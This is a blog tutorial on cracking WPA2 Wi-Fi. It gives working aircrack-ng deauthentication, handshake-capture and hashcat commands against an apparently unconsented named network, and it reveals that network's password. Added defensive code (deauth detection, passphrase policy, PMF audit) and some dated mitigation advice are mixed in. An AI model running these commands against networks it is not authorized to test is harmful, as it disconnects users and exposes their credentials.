Wi-Fi Hacking : Deauthentication Attack and Password Cracking.

Shivprasad Lavhat
5 min read · Sep 1, 2024


STEP 1: Go to Devices and attach the external Wi-Fi adapter to your Kali machine.

I will be using the TP-Link AC600 adapter.

Check whether the Wi-Fi adapter is attached to your system with the following command.

lsusb

STEP 2: Installation. We use the aircrack-ng tool suite to perform this attack.

Download and install aircrack-ng with the following command.

sudo apt install aircrack-ng

STEP 3: Check the available network interfaces and their basic information.

Use the following command:

iwconfig

STEP 4: The adapter is in managed mode. To monitor traffic and inject deauth packets, we have to put the adapter into monitor mode with the following command.

airmon-ng start wlan0

‘airmon-ng’: the script used to enable or disable monitor mode on network adapters.

‘start’: the argument instructing airmon-ng to start monitor mode.

‘wlan0’: the default name of the network interface to be used for the attack.

Now we have to start monitoring nearby Wi-Fi networks.

STEP 5: We can list all available networks by running airodump-ng on the monitor-mode interface.

As we can see, all nearby networks are listed with their BSSID (MAC address), the channel they operate on (CH), the encryption type (ENC), and so on.

Our target is the 1 Saidham-2–5G.

STEP 6: After choosing the target and copying its BSSID, we monitor only that network while continuously trying to capture a handshake, using the following command.

airodump-ng --bssid <<BSSID>> -c <<Channel_number>> -w psk <<wlan>>

Monitoring and handshake capture are now running against the target. Next we deauthenticate all client devices from the router so that they automatically try to reconnect, and airodump-ng captures the handshake.

STEP 7: Deauthenticate using aireplay-ng with the following command:

aireplay-ng -0 0 -a <<BSSID>> <<wlan>>

  • -0 selects the deauthentication attack.
  • 0 is the number of deauthentication bursts to send; 0 means keep sending until the command is stopped.
  • -a <<BSSID>> names the access point and <<wlan>> is the monitor-mode interface; together the command sends continuous deauthentication packets.

As the attack starts, it disassociates all clients connected to the network. The devices then automatically try to reconnect, and the handshake exchanged during that reconnection is captured by the ‘airodump-ng’ instance still running.
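A defender's view of this step, as an added example that is not part of the original post: a sliding-window detector for deauthentication and disassociation floods, the kind of logic a wireless IDS applies to monitor-mode captures. It hand-parses the 802.11 management header (no Scapy needed). The frames it runs over are constructed in memory with made-up MAC addresses and nothing is transmitted; the threshold and window are assumptions to tune for your network.

```python
"""Detect deauthentication/disassociation floods in raw 802.11 frames (added example)."""
import struct
from collections import defaultdict, deque

BROADCAST = b"\xff\xff\xff\xff\xff\xff"
SUBTYPE_DISASSOC = 0x0A   # management frame subtype 10
SUBTYPE_DEAUTH = 0x0C     # management frame subtype 12


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) for a deauth/disassoc frame, else None.

    802.11 MAC header: frame control (2) | duration (2) | addr1 (6) | addr2 (6)
    | addr3 (6) | sequence control (2). The body of these two subtypes starts
    with a 2-byte little-endian reason code, so a complete frame is >= 26 bytes.
    """
    if len(frame) < 26:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3          # 0 = management
    subtype = (fc0 >> 4) & 0xF
    if ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)
    return subtype, dst, src, bssid, reason


class DeauthFloodDetector:
    """Alert once per BSSID when more than `threshold` deauth/disassoc frames
    arrive within `window` seconds. Broadcast-addressed frames are the
    signature of a mass kick-off, so the alert records that too."""

    def __init__(self, threshold: int = 10, window: float = 5.0):
        self.threshold = threshold
        self.window = window
        self.events = defaultdict(deque)   # bssid -> timestamps inside the window
        self.alerted = set()

    def feed(self, ts: float, frame: bytes):
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            return None
        subtype, dst, src, bssid, reason = parsed
        q = self.events[bssid]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) > self.threshold and bssid not in self.alerted:
            self.alerted.add(bssid)
            return {
                "bssid": mac_str(bssid),
                "count": len(q),
                "broadcast": dst == BROADCAST,
                "reason": reason,
                "subtype": "deauth" if subtype == SUBTYPE_DEAUTH else "disassoc",
            }
        return None


def build_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes, reason: int) -> bytes:
    """Construct a management frame in memory for the demo (never transmitted)."""
    fc = bytes([(subtype << 4), 0x00])   # type 0 = management, protocol version 0
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + struct.pack("<H", reason)


def demo_alerts() -> list:
    """Run the detector over a constructed trace: one quiet AP, one flooded AP."""
    ap_quiet = bytes.fromhex("020000000001")   # constructed locally-administered MACs
    ap_hit = bytes.fromhex("020000000002")
    client = bytes.fromhex("020000000010")
    trace = []
    # Normal behaviour: a station leaving politely (reason 3), minutes apart.
    for i in range(3):
        trace.append((i * 300.0, build_frame(SUBTYPE_DEAUTH, ap_quiet, client, ap_quiet, 3)))
    # Flood: 40 broadcast deauths claiming to come from the AP within two seconds.
    for i in range(40):
        trace.append((1000.0 + i * 0.05, build_frame(SUBTYPE_DEAUTH, BROADCAST, ap_hit, ap_hit, 7)))
    det = DeauthFloodDetector(threshold=10, window=5.0)
    return [a for ts, f in trace if (a := det.feed(ts, f)) is not None]


if __name__ == "__main__":
    for alert in demo_alerts():
        print(alert)
```

On a real capture the timestamps and frame bytes come from the radiotap/pcap layer; the detector itself only needs the 802.11 header, so it works the same on live monitor-mode traffic or on a saved .cap file.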

As can be seen at the top right of the screen, airodump-ng captured the WPA handshake for the access point with that BSSID.

We can list the captured handshake files with the ls command in the current directory.

We can inspect the capture file with the following command.

aircrack-ng <<File_Name.cap>>

STEP 8: Use hcxpcapngtool to convert the .cap file into hashcat's hash format.

hcxpcapngtool <<file_name>> -o pass.hc22000 -E essid.wordlist

  • hcxpcapngtool: converts capture files to hashcat-compatible formats.
  • <<file_name>>: the input capture file (a .cap or .pcapng file).
  • -o pass.hc22000: writes the converted hashes in hashcat's .hc22000 format.
  • -E essid.wordlist: writes the ESSIDs found in the capture to a wordlist file that can also be fed to the cracker.

STEP 9 : Using the hashcat tool, I attempted to crack the hash and was successful in obtaining the password.

We will use rockyou.txt as the dictionary for the attack.

hashcat -m 22000 pass.hc22000 /usr/share/wordlists/rockyou.txt

  • hashcat: the password-cracking tool.
  • -m 22000: the hash mode for WPA/WPA2 (hashcat's mode number for .hc22000 files).
  • pass.hc22000: the input file containing the WPA/WPA2 hash data.
  • /usr/share/wordlists/rockyou.txt: the wordlist used for the cracking attempt.

We have cracked the hash and obtained the password.

The password is: 0987654321

MITIGATIONS:

Use a strong and unique Wi-Fi password: Avoid using easily guessable passwords like “0987654321”. Use a strong and unique password that is hard to crack.
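An added example, not code from the original post, showing why the rockyou.txt run in Step 9 succeeds against a password like this one and what a sensible passphrase policy looks like. WPA/WPA2-Personal derives the Pairwise Master Key as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so every candidate costs the attacker the same fixed amount of work and the defender's only lever is the number of candidates. The policy thresholds (16 characters, three character classes, a sequential run of five or more digits) and the tiny COMMON_PSKS set are assumptions standing in for a real policy and a real wordlist.

```python
"""WPA-Personal key derivation cost and a passphrase policy check (added example)."""
import hashlib
import time

# Constructed stand-in for a real wordlist such as rockyou.txt (assumption).
COMMON_PSKS = {"password", "12345678", "0987654321", "1234567890", "qwertyuiop"}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derivations_per_second(sample: int = 20) -> float:
    """Rough single-core PMK rate. GPUs reach orders of magnitude more, which is
    why keyspace, not per-guess cost, decides how long a PSK survives."""
    t0 = time.perf_counter()
    for i in range(sample):
        derive_pmk(f"candidate{i}", "demo-ssid")
    return sample / (time.perf_counter() - t0)


def longest_sequential_run(s: str) -> int:
    """Longest substring of digits that steps by +1 or -1 at every character,
    e.g. 9 for '0987654321' (the run 987654321)."""
    best = cur = 1 if s else 0
    step = 0
    for a, b in zip(s, s[1:]):
        d = ord(b) - ord(a)
        if a.isdigit() and b.isdigit() and d in (1, -1) and step in (0, d):
            step, cur = d, cur + 1
        else:
            step, cur = 0, 1
        best = max(best, cur)
    return best


def psk_findings(passphrase: str) -> list:
    """Policy problems with a candidate passphrase; an empty list means acceptable."""
    findings = []
    n = len(passphrase)
    if not 8 <= n <= 63:
        findings.append("WPA-Personal passphrases must be 8 to 63 characters")
    if n < 16:                                    # assumed minimum length
        findings.append("shorter than 16 characters")
    if passphrase.isdigit():
        findings.append("digits only")
    if longest_sequential_run(passphrase) >= 5:   # assumed threshold
        findings.append("contains a sequential digit run")
    if passphrase.lower() in COMMON_PSKS:
        findings.append("present in common-password list")
    classes = sum(any(f(c) for c in passphrase)
                  for f in (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum()))
    if classes < 3:
        findings.append("fewer than three character classes")
    return findings


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    print(f"{derivations_per_second():.0f} PMK derivations/s on this CPU")
    for candidate in ("0987654321", "Correct-Horse-Battery-9"):
        print(candidate, "->", psk_findings(candidate) or "ok")
```

The first line printed must match the PMK in the 802.11i test vectors, which is a quick way to confirm the derivation is implemented correctly; the per-second figure makes the point that a ten-digit PSK (10^10 candidates) is a matter of hours for commodity GPUs, while a long multi-word passphrase is not.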

Use WPA2-PSK (AES) encryption: Make sure your router is using WPA2-PSK (AES) encryption, which is the most secure encryption protocol available for Wi-Fi networks.
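The check a practitioner wants here, as an added example not from the original post: the deauthentication step earlier in this article works because WPA2 leaves management frames unauthenticated, and the direct countermeasure is Protected Management Frames (802.11w), optional in WPA2 and mandatory in WPA3. An access point advertises whether PMF is capable or required in the RSN information element (element ID 48) of its beacons, so you can audit your own APs from a beacon capture. The three RSN IEs below are constructed by hand for the demo; the cipher and AKM suite numbers are the 802.11 standard's.

```python
"""Audit an AP's RSN information element for Protected Management Frames (added example)."""
import struct

RSN_OUI = b"\x00\x0f\xac"
CIPHERS = {2: "TKIP", 4: "CCMP-128", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 18: "OWE"}


def suite_name(suite: bytes, table: dict) -> str:
    """Map a 4-byte suite selector (OUI + type) to a name."""
    if suite[:3] != RSN_OUI:
        return "vendor:" + suite.hex()
    return table.get(suite[3], f"unknown-{suite[3]}")


def parse_rsn_ie(ie: bytes) -> dict:
    """Decode the RSN IE fields that matter for this audit.

    Layout: ID (1) | length (1) | version (2 LE) | group cipher (4) | pairwise
    count (2 LE) | pairwise suites (4 each) | AKM count (2 LE) | AKM suites
    (4 each) | RSN capabilities (2 LE, optional) | ... PMKIDs, group mgmt cipher.
    """
    if len(ie) < 2 or ie[0] != 48:
        raise ValueError("not an RSN information element")
    length = ie[1]
    body = ie[2:2 + length]
    if len(body) != length:
        raise ValueError("truncated RSN IE")
    (version,) = struct.unpack_from("<H", body, 0)
    off = 2
    group = body[off:off + 4]
    off += 4
    (n_pair,) = struct.unpack_from("<H", body, off)
    off += 2
    pairwise = [body[off + 4 * i:off + 4 * i + 4] for i in range(n_pair)]
    off += 4 * n_pair
    (n_akm,) = struct.unpack_from("<H", body, off)
    off += 2
    akms = [body[off + 4 * i:off + 4 * i + 4] for i in range(n_akm)]
    off += 4 * n_akm
    caps = 0
    if off + 2 <= len(body):            # RSN Capabilities field is optional
        (caps,) = struct.unpack_from("<H", body, off)
    return {
        "version": version,
        "group_cipher": suite_name(group, CIPHERS),
        "pairwise": [suite_name(s, CIPHERS) for s in pairwise],
        "akm": [suite_name(s, AKMS) for s in akms],
        "mfpc": bool(caps & 0x0080),    # bit 7: management frame protection capable
        "mfpr": bool(caps & 0x0040),    # bit 6: management frame protection required
    }


def deauth_exposure(ie: bytes) -> str:
    """Classify how exposed this AP's clients are to forged deauth/disassoc frames."""
    r = parse_rsn_ie(ie)
    if r["mfpr"]:
        return "protected: PMF required, forged deauth/disassoc frames are discarded"
    if r["mfpc"]:
        return "partial: PMF optional, only clients that negotiate it are protected"
    return "exposed: no PMF, an unauthenticated deauth disconnects every client"


# Constructed RSN IEs as a sniffer would show them in a beacon (demo data).
WPA2_PSK_NO_PMF = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "0000")
WPA2_PSK_PMF_OPT = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac02" "8000")
WPA3_SAE_PMF_REQ = bytes.fromhex("3014" "0100" "000fac04" "0100" "000fac04" "0100" "000fac08" "c000")

if __name__ == "__main__":
    for label, ie in (("WPA2-PSK", WPA2_PSK_NO_PMF), ("WPA2-PSK+PMF", WPA2_PSK_PMF_OPT),
                      ("WPA3-SAE", WPA3_SAE_PMF_REQ)):
        print(f"{label:13} {parse_rsn_ie(ie)['akm']} -> {deauth_exposure(ie)}")
```

A result of "exposed" on your own AP means the attack in this article will work exactly as shown; enabling PMF (required, not just capable) or moving to WPA3 is the configuration change that removes it, and the same parser run over a full beacon capture gives you that answer for every AP in the building.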

Regularly update your router’s firmware: Keep your router’s firmware up to date to ensure you have the latest security patches and features.

Use a firewall: Enable the firewall on your router and devices to block unauthorized access to your network.

Use MAC address filtering: Enable MAC address filtering on your router to only allow specific devices to connect to your network.

Use a VPN: Use a Virtual Private Network (VPN) to encrypt your internet traffic, even when connected to a public Wi-Fi network.

Monitor your network activity: Regularly monitor your network activity to detect and respond to suspicious behavior.

Use a secure Wi-Fi adapter: Use a secure Wi-Fi adapter that has built-in security features, such as encryption and secure boot.

Disable WPS: Disable Wi-Fi Protected Setup (WPS) on your router, as it can be vulnerable to attacks.

Perform regular security audits: Perform regular security audits to identify and address vulnerabilities in your network.

Conclusion:

In summary, we successfully performed the attack, captured the handshake, and cracked the Wi-Fi password, revealing it as “0987654321.”
